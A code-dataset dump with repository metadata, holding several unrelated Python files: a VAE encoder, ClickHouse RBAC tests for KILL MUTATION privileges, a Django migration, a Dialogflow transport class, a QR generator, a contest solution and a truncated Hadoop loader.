hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cfebdc0f6cd106411e690aa30a03ad7d8289dd06
| 251
|
py
|
Python
|
pynovice/gaode_map/__init__.py
|
wqwangchn/novice
|
d52190a9cd5045726e49aff8610b718636c304c7
|
[
"MIT"
] | 2
|
2020-06-28T08:30:47.000Z
|
2020-11-04T07:55:42.000Z
|
pynovice/gaode_map/__init__.py
|
wqwangchn/novice
|
d52190a9cd5045726e49aff8610b718636c304c7
|
[
"MIT"
] | 8
|
2020-11-13T18:56:02.000Z
|
2022-02-10T03:16:52.000Z
|
pynovice/gaode_map/__init__.py
|
wqwangchn/novice
|
d52190a9cd5045726e49aff8610b718636c304c7
|
[
"MIT"
] | 2
|
2020-09-17T00:12:36.000Z
|
2020-11-04T07:55:55.000Z
|
# coding=utf-8
# /usr/bin/env python
'''
Author: wenqiangw
Email: wenqiangw@opera.com
Date: 2020-07-28 15:07
Desc: 数据分布画图
'''
from .trajectory_playback import Trajectory as Trajectory_his
from .trajectory_playback_v2 import Trajectory as Trajectory
| 19.307692
| 61
| 0.784861
|
9996b6f808a2cba8342baf6f3ae3984a2648f8f7
| 3,616
|
py
|
Python
|
src/models/encoders.py
|
dbarrejon/Shi-VAE
|
b6f2c92e40d3585274dc7586e3b36d8ca45624aa
|
[
"MIT"
] | 4
|
2021-03-17T01:55:00.000Z
|
2021-11-02T10:02:28.000Z
|
src/models/encoders.py
|
dbarrejon/Shi-VAE
|
b6f2c92e40d3585274dc7586e3b36d8ca45624aa
|
[
"MIT"
] | null | null | null |
src/models/encoders.py
|
dbarrejon/Shi-VAE
|
b6f2c92e40d3585274dc7586e3b36d8ca45624aa
|
[
"MIT"
] | null | null | null |
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright (c) 2021. by Daniel Barrejon, UC3M. +
# All rights reserved. This file is part of the Shi-VAE, and is released under the +
# "MIT License Agreement". Please see the LICENSE file that should have been included +
# as part of this package. +
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from abc import ABC
import torch
import torch.nn as nn
from lib import utils
from lib.aux import set_device
from models import samplers
class GMEncoder(nn.Module, ABC):
r"""
Encoder for the Shi-VAE, two latent codes: :math:`z`, real and :math:`s, discrete.
"""
def __init__(self, x_dim, z_dim, s_dim, h_dim, activation_layer='ReLU'):
r"""
Args:
x_dim (int): Dimensionality of x.
z_dim (int): Dimensionality of :math:`z`.
s_dim (int): Dimensionality of :math:`s`.
h_dim (int): Dimensionality of the embedding space for the LSTM.
activation_layer (string): Choose "relu", "tanh" or "sigmoid".
"""
super(GMEncoder, self).__init__()
self.h_dim = h_dim
self.x_dim = x_dim
self.z_dim = z_dim
self.s_dim = s_dim
self.device = set_device()
self.activation = utils.set_activation_layer(activation_layer)
# Sampler
self.sampler = samplers.Sampler()
# Gumbel Softmax for discrete latent variable: s
self.gs_sampler = samplers.GumbelSoftmaxSampler()
# Feature extraction
self.phi_x = nn.Sequential(
nn.Linear(self.x_dim, self.h_dim),
self.activation,
nn.Linear(self.h_dim, self.h_dim),
self.activation)
self.phi_x_s = nn.Sequential(
nn.Linear(self.x_dim + self.h_dim, self.h_dim),
self.activation,
nn.Linear(self.h_dim, self.s_dim),
nn.LeakyReLU(negative_slope=0.01))
# Encoder
self.enc = nn.Sequential(
nn.Linear(self.h_dim + self.h_dim + self.s_dim, self.h_dim), # add s_dim
self.activation,
nn.Linear(self.h_dim, self.h_dim),
self.activation)
self.enc_mean = nn.Linear(self.h_dim, self.z_dim)
self.enc_std = nn.Sequential(
nn.Linear(self.h_dim, self.z_dim),
nn.Softplus())
def forward(self, x_t, h_past, temp=3):
r"""
Forward pass.
Args:
x_t (Tensor): Shape (BxD)
h_past (Tensor): Shape (Bxh_dim)
temp (int): Temperature value for the Gumbel Softmax sampler.
Returns:
z_pack: Tuple with sample z, z mean and z std.
s_pack: Tuple with sample s and s probs.
"""
phi_x_t = self.phi_x(x_t)
phi_x_t_s = self.phi_x_s(torch.cat([x_t, h_past], 1)) # v2: z_t prior for s_t+1
# s_t
s_t_logits = phi_x_t_s
s_t_probs = torch.nn.functional.softmax(s_t_logits, dim=1) # probs Categorical
s_t = self.gs_sampler.gumbel_softmax(s_t_logits, temp, one_hot=False)
s_pack = (s_t, s_t_probs)
enc_t = self.enc(torch.cat([phi_x_t, s_t, h_past], 1))
# moments
z_t_mean = self.enc_mean(enc_t)
z_t_std = self.enc_std(enc_t)
# sample
z_t = self.sampler.reparameterized_sample(z_t_mean, z_t_std)
z_pack = (z_t, z_t_mean, z_t_std)
return z_pack, s_pack
| 36.525253
| 90
| 0.551438
|
41d4a837480486e392e325f7e33f7190ea59fdf7
| 11,090
|
py
|
Python
|
tests/testflows/rbac/tests/privileges/kill_mutation.py
|
edani/ClickHouse
|
17a8a4e9664fabed5b370b37e148139ba698acf5
|
[
"Apache-2.0"
] | 18
|
2021-05-29T01:12:33.000Z
|
2021-11-18T12:34:48.000Z
|
tests/testflows/rbac/tests/privileges/kill_mutation.py
|
edani/ClickHouse
|
17a8a4e9664fabed5b370b37e148139ba698acf5
|
[
"Apache-2.0"
] | null | null | null |
tests/testflows/rbac/tests/privileges/kill_mutation.py
|
edani/ClickHouse
|
17a8a4e9664fabed5b370b37e148139ba698acf5
|
[
"Apache-2.0"
] | 2
|
2021-07-13T06:42:45.000Z
|
2021-07-21T13:47:22.000Z
|
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def no_privilege(self, node=None):
"""Check that user doesn't need privileges to execute `KILL MUTATION` with no mutations.
"""
if node is None:
node = self.context.node
with Scenario("kill mutation on a table"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I attempt to kill mutation on table"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("kill mutation on cluster"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I attempt to kill mutation on cluster"):
node.query(f"KILL MUTATION ON CLUSTER sharded_cluster WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
@TestSuite
def privileges_granted_directly(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Suite(test=update, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
Suite(test=delete, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
Suite(test=drop_column, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
@TestSuite
def privileges_granted_via_role(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(test=update, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
Suite(test=delete, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
Suite(test=drop_column, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterUpdate("1.0")
)
def update(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER UPDATE`
if and only if the user has `ALTER UPDATE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER UPDATE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER UPDATE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER UPDATE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER UPDATE privilege"):
node.query(f"REVOKE ALTER UPDATE ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDelete("1.0")
)
def delete(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DELETE`
if and only if the user has `ALTER DELETE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER DELETE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER DELETE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER DELETE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER DELETE privilege"):
node.query(f"REVOKE ALTER DELETE ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDropColumn("1.0")
)
def drop_column(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DROP COLUMN`
if and only if the user has `ALTER DROP COLUMN` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER DROP COLUMN without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER DROP COLUMN with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER DROP COLUMN with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER DROP COLUMN privilege"):
node.query(f"REVOKE ALTER DROP COLUMN ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation("1.0"),
)
@Name("kill mutation")
def feature(self, node="clickhouse1", stress=None, parallel=None):
"""Check the RBAC functionality of KILL MUTATION.
"""
self.context.node = self.context.cluster.node(node)
if parallel is not None:
self.context.parallel = parallel
if stress is not None:
self.context.stress = stress
Suite(run=no_privilege, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_via_role, setup=instrument_clickhouse_server_log)
| 43.151751
| 163
| 0.656267
|
6a14d4b03e056ca4ff90571a80e1e0f92a0c932a
| 545
|
py
|
Python
|
importer/migrations/0008_campaigntaskdetails_project.py
|
juliecentofanti172/juliecentofanti.github.io
|
446ea8522b9f4a6709124ebb6e0f675acf7fe205
|
[
"CC0-1.0"
] | 134
|
2018-05-23T14:00:29.000Z
|
2022-03-10T15:47:53.000Z
|
importer/migrations/0008_campaigntaskdetails_project.py
|
ptrourke/concordia
|
56ff364dbf38cb8a763df489479821fe43b76d69
|
[
"CC0-1.0"
] | 1,104
|
2018-05-22T20:18:22.000Z
|
2022-03-31T17:28:40.000Z
|
importer/migrations/0008_campaigntaskdetails_project.py
|
ptrourke/concordia
|
56ff364dbf38cb8a763df489479821fe43b76d69
|
[
"CC0-1.0"
] | 32
|
2018-05-22T20:22:38.000Z
|
2021-12-21T14:11:44.000Z
|
# Generated by Django 2.0.8 on 2018-09-20 20:05
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("importer", "0007_auto_20180917_1654")]
operations = [
migrations.AddField(
model_name="campaigntaskdetails",
name="project",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="concordia.Project",
),
)
]
| 24.772727
| 60
| 0.59633
|
5f6b6182b98c553b844a23464fb14483cf25c5c3
| 10,025
|
py
|
Python
|
google/cloud/dialogflow_v2/services/participants/transports/base.py
|
rogers140/python-dialogflow
|
d9ce91f8590947736560727624fbc0846601ce1c
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/dialogflow_v2/services/participants/transports/base.py
|
rogers140/python-dialogflow
|
d9ce91f8590947736560727624fbc0846601ce1c
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/dialogflow_v2/services/participants/transports/base.py
|
rogers140/python-dialogflow
|
d9ce91f8590947736560727624fbc0846601ce1c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflow_v2.types import participant
from google.cloud.dialogflow_v2.types import participant as gcd_participant
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflow",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class ParticipantsTransport(abc.ABC):
"""Abstract transport class for Participants."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
)
DEFAULT_HOST: str = "dialogflow.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_participant: gapic_v1.method.wrap_method(
self.create_participant, default_timeout=None, client_info=client_info,
),
self.get_participant: gapic_v1.method.wrap_method(
self.get_participant, default_timeout=None, client_info=client_info,
),
self.list_participants: gapic_v1.method.wrap_method(
self.list_participants, default_timeout=None, client_info=client_info,
),
self.update_participant: gapic_v1.method.wrap_method(
self.update_participant, default_timeout=None, client_info=client_info,
),
self.analyze_content: gapic_v1.method.wrap_method(
self.analyze_content,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=220.0,
),
default_timeout=220.0,
client_info=client_info,
),
self.suggest_articles: gapic_v1.method.wrap_method(
self.suggest_articles, default_timeout=None, client_info=client_info,
),
self.suggest_faq_answers: gapic_v1.method.wrap_method(
self.suggest_faq_answers, default_timeout=None, client_info=client_info,
),
}
@property
def create_participant(
self,
) -> Callable[
[gcd_participant.CreateParticipantRequest],
Union[gcd_participant.Participant, Awaitable[gcd_participant.Participant]],
]:
raise NotImplementedError()
@property
def get_participant(
self,
) -> Callable[
[participant.GetParticipantRequest],
Union[participant.Participant, Awaitable[participant.Participant]],
]:
raise NotImplementedError()
@property
def list_participants(
self,
) -> Callable[
[participant.ListParticipantsRequest],
Union[
participant.ListParticipantsResponse,
Awaitable[participant.ListParticipantsResponse],
],
]:
raise NotImplementedError()
@property
def update_participant(
self,
) -> Callable[
[gcd_participant.UpdateParticipantRequest],
Union[gcd_participant.Participant, Awaitable[gcd_participant.Participant]],
]:
raise NotImplementedError()
@property
def analyze_content(
self,
) -> Callable[
[gcd_participant.AnalyzeContentRequest],
Union[
gcd_participant.AnalyzeContentResponse,
Awaitable[gcd_participant.AnalyzeContentResponse],
],
]:
raise NotImplementedError()
@property
def suggest_articles(
self,
) -> Callable[
[participant.SuggestArticlesRequest],
Union[
participant.SuggestArticlesResponse,
Awaitable[participant.SuggestArticlesResponse],
],
]:
raise NotImplementedError()
@property
def suggest_faq_answers(
self,
) -> Callable[
[participant.SuggestFaqAnswersRequest],
Union[
participant.SuggestFaqAnswersResponse,
Awaitable[participant.SuggestFaqAnswersResponse],
],
]:
raise NotImplementedError()
__all__ = ("ParticipantsTransport",)
| 36.856618
| 103
| 0.648978
|
fd8fca7e72aff6669420718c024b098b45600dc8
| 479
|
py
|
Python
|
data_structures/array/array_string.py
|
Nobodylesszb/python_module
|
37d2cdcf89a3ff02a9e560696a059cec9272bd1f
|
[
"MIT"
] | null | null | null |
data_structures/array/array_string.py
|
Nobodylesszb/python_module
|
37d2cdcf89a3ff02a9e560696a059cec9272bd1f
|
[
"MIT"
] | null | null | null |
data_structures/array/array_string.py
|
Nobodylesszb/python_module
|
37d2cdcf89a3ff02a9e560696a059cec9272bd1f
|
[
"MIT"
] | null | null | null |
#该array模块定义了一个非常类似于a的序列数据结构list,
# 除了所有成员必须具有相同的基本类型。
# 支持的类型都是数字或其他固定大小的基本类型,如字节
import array
import binascii
s = b'This is the array.'
a = array.array('b', s)
print('As byte string:', s)
print('As array :', a)
print('As hex :', binascii.hexlify(a))
"""
As byte string: b'This is the array.'
As array : array('b', [84, 104, 105, 115, 32, 105, 115, 32, 116, 104, 101, 32, 97, 114, 114, 97, 121, 46])
As hex : b'54686973206973207468652061727261792e'
"""
| 26.611111
| 111
| 0.649269
|
bae2ffb46278c08c3bdcf07190687485f82cbd11
| 1,137
|
py
|
Python
|
sa-fastapi/qr-code-fs-atom/scripted-atom/scripts/qr_generator.py
|
piximos/scripted-atoms
|
6156803e2512bec11ed0403121b9e7f9bf019d99
|
[
"MIT"
] | 2
|
2020-12-21T20:49:26.000Z
|
2021-12-23T16:04:48.000Z
|
sa-fastapi/qr-code-s3-atom/scripted-atom/scripts/qr_generator.py
|
piximos/scripted-atoms
|
6156803e2512bec11ed0403121b9e7f9bf019d99
|
[
"MIT"
] | null | null | null |
sa-fastapi/qr-code-s3-atom/scripted-atom/scripts/qr_generator.py
|
piximos/scripted-atoms
|
6156803e2512bec11ed0403121b9e7f9bf019d99
|
[
"MIT"
] | null | null | null |
import os
import qrcode
from re import match
class QrGenerator:
@staticmethod
def generate_qr(data: str, qr_id: str, color_fill: str = None, color_bg: str = None):
QrGenerator.test_hex_value(color_fill)
QrGenerator.test_hex_value(color_bg)
qr_dir = os.getenv('QR_TMP_FOLDER')
os.makedirs(qr_dir, exist_ok=True)
qr_path = "{}/{}.png".format(qr_dir, qr_id)
qr = qrcode.QRCode(
version=3,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=25,
border=3,
)
qr.add_data(data)
qr.make(fit=True)
img = qr.make_image(fill_color=os.getenv(
'SA_QR_FILL_COLOR') if not color_fill else color_fill, back_color=os.getenv(
'SA_QR_BACKGROUND_COLOR') if not color_bg else color_bg)
img.save(qr_path)
return qr_path
@staticmethod
def test_hex_value(hex: str = None):
if hex is not None and not match("^\#[a-fA-F0-9]{6}$", hex):
raise TypeError("Passed hex color does not match the following pattern : {}".format("^\#[a-fA-F0-9]{6}$"))
| 31.583333
| 118
| 0.619173
|
1a3e2506f9910819ddc1eb4222619fa09df838f5
| 403
|
py
|
Python
|
arc/075/d.py
|
wotsushi/competitive-programming
|
17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86
|
[
"MIT"
] | 3
|
2019-06-25T06:17:38.000Z
|
2019-07-13T15:18:51.000Z
|
arc/075/d.py
|
wotsushi/competitive-programming
|
17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86
|
[
"MIT"
] | null | null | null |
arc/075/d.py
|
wotsushi/competitive-programming
|
17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86
|
[
"MIT"
] | null | null | null |
from math import ceil
# 入力
N, A, B = map(int, input().split())
h = [int(input()) for _ in range(N)]
# 二分法により解を求める
def bis(p, ok, ng):
mid = (ok + ng) // 2
return (
ok if abs(ok - ng) == 1 else
bis(p, mid, ng) if p(mid) else
bis(p, ok, mid)
)
ans = bis(
lambda k: sum(max(0, ceil((x - k * B) / (A - B))) for x in h) <= k,
10**10,
0
)
# 出力
print(ans)
| 15.5
| 71
| 0.476427
|
4744f149b50ff979daa103c28ad272f1f00d7722
| 5,394
|
py
|
Python
|
hadoop/hadoopget.py
|
gjgj821/traffic_prediction
|
ceed31ccf9cdaa83cfa7912111bf0ec2e699467e
|
[
"MIT"
] | 3
|
2017-08-11T02:29:45.000Z
|
2021-08-05T03:05:57.000Z
|
hadoop/hadoopget.py
|
gjgj821/traffic_prediction
|
ceed31ccf9cdaa83cfa7912111bf0ec2e699467e
|
[
"MIT"
] | null | null | null |
hadoop/hadoopget.py
|
gjgj821/traffic_prediction
|
ceed31ccf9cdaa83cfa7912111bf0ec2e699467e
|
[
"MIT"
] | 2
|
2015-09-07T08:10:12.000Z
|
2016-03-13T08:00:25.000Z
|
# coding=utf-8
import os
from core.relative import Relative, Parent
__author__ = 'GaoJie'
# 加载hadoop结果集,计算
DATA_DIR = 'data/mapred/'
# merge -------- should map to id
# adx :int, --U 0
# device_device_type :int, --u 1
# detworkConnection_connection_type :int, --U 2
# device_os :int, --U 3
# device_os_version :int, --U 3
# detworkConnection_carrier_id :int, --U 4
# app_category_id :int, --U 5
# location_geo_criteria_id :int, --U 6
# device_brand :chararray, --u 7
# device_model :chararray, --u 7
# app_limei_app_id :int, --U 8
DIM_LIST = ['adx', 'DeviceType', 'ConnectionType', 'OS', 'CarrierName', 'Categorys', 'Citys', 'DeviceModel', 'AppId']
NEED_RELATE = ['DeviceModel']
NEED_PATENT = ['Citys', 'OS', 'DeviceModel']
data = None
def get_sum(date_time, field_map, table, sum_field='Requests', date_field='Datetime', is_train=True, where='1'):
"""
获取多维度组合的总量,代理接口,与dbget同步
"""
return data.get_sum(field_map)
def get_group(date_time, field, table, sum_field='Requests', date_field='Datetime', is_train=True, where='1'):
"""
获取多维度组合的分组信息,代理接口,与dbget同步
"""
return data.get_group(field)
class HadoopData:
def __init__(self):
self.term_map = [0,{},{},{},{},{}]
self.need_parent_index = []
for item in NEED_PATENT:
